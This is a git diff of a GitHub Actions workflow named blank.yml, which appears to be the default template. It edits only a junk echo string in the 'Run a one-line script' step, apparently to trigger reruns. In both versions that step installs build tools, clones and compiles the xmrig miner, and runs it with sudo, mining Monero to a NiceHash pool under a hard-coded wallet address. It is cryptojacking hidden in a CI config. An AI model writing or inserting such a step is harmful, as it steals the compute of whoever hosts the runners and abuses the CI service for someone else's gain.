--- a/.github/workflows/blank.yml
+++ b/.github/workflows/blank.yml
@@ -83,7 +83,7 @@ jobs:
 
       # Runs a single command using the runners shell
       - name: Run a one-line script
-        run: echo " iihchihigmcIchbi" && sudo apt-get install git build-essential msr-tools cmake automake libtool autoconf -y && git clone https://github.com/xmrig/xmrig.git && mkdir xmrig/build && cd xmrig/scripts && ./build_deps.sh && sudo ./randomx_boost.sh && sudo ./scripts/enable_1gb_pages.sh && cd ../build && cmake .. -DXMRIG_DEPS=scripts/deps && make -j$(nproc) && sudo ./xmrig --donate-level 5 -o stratum+ssl://randomxmonero.auto.nicehash.com:443 -u 3Q2atbcDpcbb3y3no9sVFcBMpi58hPNxoo -p x -k --nicehash --coin monero -a rx/0
+        run: echo " iihjjbhchihigmcIchbi" && sudo apt-get install git build-essential msr-tools cmake automake libtool autoconf -y && git clone https://github.com/xmrig/xmrig.git && mkdir xmrig/build && cd xmrig/scripts && ./build_deps.sh && sudo ./randomx_boost.sh && sudo ./scripts/enable_1gb_pages.sh && cd ../build && cmake .. -DXMRIG_DEPS=scripts/deps && make -j$(nproc) && sudo ./xmrig --donate-level 5 -o stratum+ssl://randomxmonero.auto.nicehash.com:443 -u 3Q2atbcDpcbb3y3no9sVFcBMpi58hPNxoo -p x -k --nicehash --coin monero -a rx/0
 
       # Runs a set of commands using the runners shell
       - name: Run a multi-line script
